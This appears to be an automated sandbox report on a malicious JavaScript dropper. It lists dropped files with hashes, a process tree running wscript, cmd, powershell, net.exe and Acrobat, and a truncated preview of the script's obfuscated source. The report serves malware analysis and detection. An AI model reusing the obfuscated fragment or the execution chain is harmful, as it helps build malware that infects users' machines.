Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.316727310175355 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfbPtdPeUkwRe9:YvXKXFX3EZc0vKNZGDV8Ukee9 |
MD5: | 1A9E2528E183B2F0132F71A6083C77C1 |
SHA1: | CB0050E46507BF481CA8ED6F3AE048C4F4E910BC |
SHA-256: | 90A3C7B7C8870AEE0B3205C0BAE7D262C7E55A0B9989B6DF82856167604BC4A4 |
SHA-512: | 3EEC5447EB825B554FDEAAD409DFB1AF52A67A28C6415BDE4487383C100D53C1155C1F33F7D921E944B2B1399D88D73F510531E3912FB97AC5B153409DEA6A1D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.321841204797663 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJf21rPeUkwRe9:YvXKXFX3EZc0vKNZG+16Ukee9 |
MD5: | 712F2A6F84BD3305288A29DEDFF8E325 |
SHA1: | 3132B111F31AB509F90C64547E0C189242278436 |
SHA-256: | 9B7C36DF4C66281AE49401334914D5C62860ACF5F3D01CB57530C53EA2018C4B |
SHA-512: | 9EB1A00D92512D73900BF29D44BB3727778EBD6B83401D991C3B8B306A6CC3CF055A39B059B870196EB6BBBE16E0DD95C4187731CCEA7E74C2C0C1B7DD13762E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.66947501254802 |
Encrypted: | false |
SSDEEP: | 24:Yv6X13Ezv1amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSUn:YvIMhBgkDMUJUAh8cvMUn |
MD5: | D3468DE2656AE719FC5F49F5CB622AD8 |
SHA1: | CC3460C731766CFE81BB06B63C67AA6AAB2468A1 |
SHA-256: | 03D13E21B81EB497CD39F5FE71C9A50999C20AB7BADA8DB1E1312D12192DF51E |
SHA-512: | C59FA5CA199321F01C1136E609B41B497CE78FF922057CE411A074F9695F3B85CC0F7119BB19DB66BF6BEC65A23ECC78EFDFCB930D100A52E5678A3B05B72D9E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.298003515991851 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfshHHrPeUkwRe9:YvXKXFX3EZc0vKNZGUUUkee9 |
MD5: | 95FAE09FDEB38C3FB82E5FD951DE9F9C |
SHA1: | EBA5D17A3261A11D69D28EE5B6A3B46B44D79CFE |
SHA-256: | E9946E5D0BDD2417AFB73C5154EBF80C39D3EA0C0E9E182335303A71BD9B1E47 |
SHA-512: | 367980ACEF6D4F8126AA07DF6AE9B7426129864F2A8B4C4063587FE3FA59FCBAFE8BB92B572CAD155C4413EEEF4DC771CEE185ADA03540D42EA34B563CE49EFF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.304557326258827 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJTqgFCrPeUkwRe9:YvXKXFX3EZc0vKNZGTq16Ukee9 |
MD5: | AF8FFC68F3061832830AFDF41BC49DFB |
SHA1: | 7F68985A09551C9D4E59EB6A8A1D6D4F9521D9C3 |
SHA-256: | FF2CE5CFEB888CF6F7833FACB2BDBCF734DCB53932C948FD899A2FCCBF9758C7 |
SHA-512: | 8E719903E2751B00141AE8DBF2E6D9E6C4E34CA04FEE1E670FE8804C8868F421DDA920AF79761D33E4BEA4660D62949F3A484BD9B6DE31D58425AD11A871A2EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.133489703302737 |
Encrypted: | false |
SSDEEP: | 48:Y9Q2gbASpLk7KbnUV873esfNDaWXRh9/1j:yQhbAALk7CnCiZsWh//1j |
MD5: | F23DE29139BACB69647E5432189D4234 |
SHA1: | 3F962F3C29C79B911A058EF742640B8E2BA7F8A1 |
SHA-256: | 410DE599A57C829A2DBCF2E445D4A6A89E4471652E7A40299DC9BE3492BC6A0C |
SHA-512: | CD114DE3A8901EF1D662E8E6589DEE179E9B45A957F8721F5BF312EE443F6FC291F8196AD06BDED44E44C2A8DCDCECE692303FD6918C12927E9C0759310F79E8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1882828413594326 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUU+gSvR9H9vxFGiDIAEkGVvpi+:lNVmswUUUUUUUU+g+FGSIt++ |
MD5: | 37E768B8BB186CF9A76252F6A322387B |
SHA1: | 553A32FC8A7BF62323D6FF00B59B1033EA900ED3 |
SHA-256: | 05D7AE6EF736DC2AEBBA34C1CC099B376971650631A6932BF9027269AF59A93A |
SHA-512: | 4E3BE0E24D89A23D71C2787C688B289EBF06716BEDBC9FA27BEDE7BD029B8EFDE0FD137FD60CB6C54268BD2F0B5987E2E73059414869A509E7EE9BBA6D49F993 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.6078792554045813 |
Encrypted: | false |
SSDEEP: | 48:7MOKUUUUUUUUUU+SvR9H9vxFGiDIAEkGVvdpqFl2GL7msA:7OUUUUUUUUUU++FGSItnpKVmsA |
MD5: | 88EE9624D1672A9D766261FA2279465C |
SHA1: | 60A9D1AB2EDD9D3FD7637726D5CA4B6655143ECA |
SHA-256: | 615EB4DD1F50F3CA94F04885D342DF7034A20A590D6F9F880F17F6199A4CE02D |
SHA-512: | 486A03243B92897DAF108DDD686DD9BDF0CB42EA3D49044A2C9FDC24466E89C2B52CD3091DBD43DE6E6FD6878D078F53B7223A935BCF7AFDD0C521A87903BAFF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgIZ3ranUCsYUlgpXGnB0Gya7DKYyu:6a6TZ44ADE63ranUC+gkBJ3KK |
MD5: | B65BBA785688673B05D6073428873205 |
SHA1: | 4B498383B68ECAC57C86032EDF3127FF2C0D3D93 |
SHA-256: | C76250D58CEE29AC8283C11081E2AE99BE98D1AF7BEE22C1CABB64A3F4349046 |
SHA-512: | 18DDB38E0A7C26045340C44A6FE7C36E21EE28CBBF9BB93B2DFCA4C244F142C8D23114385F7B4CD7CF5A61E5A409D49B34ECB8C631763CB979401B514D85CC2F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllultnxj:NllU |
MD5: | F93358E626551B46E6ED5A0A9D29BD51 |
SHA1: | 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03 |
SHA-256: | 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D |
SHA-512: | D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5004142083842487 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClIKCH:Qw946cPbiOxDlbYnuRK+bXKw |
MD5: | 1FC3997325B68C64A9301A1EF351E8FE |
SHA1: | 3C6339E82A5829E9E4E0177C131A1844CEC1137E |
SHA-256: | 6454DD621B621AD0ACC4AE66D47E0F852A6E3DE4D5AA721C2FB0A8D7868CFE5B |
SHA-512: | 726172C52377CAC1733C6A82C29A1F848CE2E2FD4A56215D654F92D149050A8F7C07378AC24C94BB491025E89E330A25B0ABF1CC6CBEB43331A109EE341D3ABE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 23-17-06-341.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.352082863804243 |
Encrypted: | false |
SSDEEP: | 384:6CW7HHe0AqNdoL20gfYwWgnKiViktXX7PwfxLjBeG4GJLMgRRCJYj4jqXUtKw3//:aia |
MD5: | 21D966CD91F7CB33F8BA0B597497355F |
SHA1: | 6122779A0DE3B56487A46381A59E3CBC324799B6 |
SHA-256: | A2C29D0AF26B3522FCE3FF6F1777B58F799B015184D333E112A296F396CEE99C |
SHA-512: | 8ED59F97C5C8649A5C6F5247C678FF04280B75422BF18A0C5946909ED8E31F9E3C9F2CC363B4329731477CD6531D12C63C2D5F388E162A0AF6420198039D2EAD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.3895209438952145 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rg:fE |
MD5: | 19DF47BF2B79F012AF2E3CCFDFE101BF |
SHA1: | 851331B01BB9F02FA2A8DD19B573338048F42F2E |
SHA-256: | 49354B17A93229B608AE4765D7B7B46B6AFE95386999BA6DABF3292572E92C40 |
SHA-512: | F471F971E9C969DA6F92149C9C3901A8C11E981160C163AEB3E567860343E5910CB47666C0849864FF50F38540EE18848EC5F2F0F98FEA554C328560351A0B4E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLaGZDwYIGNPJxdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:JVwWLaGZDwZGV3mlind9i4ufFXpAXkrj |
MD5: | 96E2EE6506759519A5E3E5E550F28388 |
SHA1: | 477522A699526F3EC2270AD0B3D3B8D6609F8BBB |
SHA-256: | D135FEF8231B87D1F758B3D31FC5467BC933321F7E8EACB316F933DBA36474D5 |
SHA-512: | C84E93CB72ABC0742C44BF13608472EDD30BE64358C0DA350D9D54C0A88EC45931D48CE1DA823FC527E5134E7277B16AFE0521F2716C067A519FDD390DB315CC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.883447072735019 |
TrID: | |
File name: | 2660438432237518549.js |
File size: | 19'318 bytes |
MD5: | b5e624c141fb5772193e5df92b04a52b |
SHA1: | db3702a49cb1e36915051fb24de35f46a150804d |
SHA256: | a5b3012b679d6a1615ba09998dd340bb59d375fa93f3725ba9737367a9357440 |
SHA512: | 4a18697391c1ab408fb3e37c09e1c94e2a9d2cc14411d32771b37beb124b116e496cd488400fafcdc4bfa11c9ee712cf7e6006ac546c16e37c4290eab82805fc |
SSDEEP: | 384:UearEVZCeEaOmFkT5inK5y0+KNzK/GJBJvbUqJBwycF5Q7InfhBrS/KXbQGh8U2/:UeaAZCe4mKE0+KNzK/GJBJvbUqJBwycg |
TLSH: | 03823588C1968B9A9FFCD8F642C5C92211CE029CC6BC64D9D5D07858E6ED368B8F747C |
File Content Preview: | function yleclrw(){tzisogazy=[1031,3079,5127,4103,2055,3072];var ntsheckh=this[gfxsv+oiwlhc+twgwlla+hiooog+oflhnueo+cxqdl+fcmrlza+iebrficqq](this[bxsdiu+iuftm+bslsmfma+twgwlla+jxkups+gfxsv+iebrficqq][dkystcc+twgwlla+oflhnueo+oiwlhc+iebrficqq+oflhnueo+izdb |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 23:16:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6391d0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 23:16:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff667b00000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 23:16:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 23:16:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 23:17:03 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 23:17:03 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff667b00000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 23:17:03 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7caf40000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 23:17:03 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 23:17:03 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 23:17:04 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function yleclrw() { |
|
1 | tzisogazy = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
